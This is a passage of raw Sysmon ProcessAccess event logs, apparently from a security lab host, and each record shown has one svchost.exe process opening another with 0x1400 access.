C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2598,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2599,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2600,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2601,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2602,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2603,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2604,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.000","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2605,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.000\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 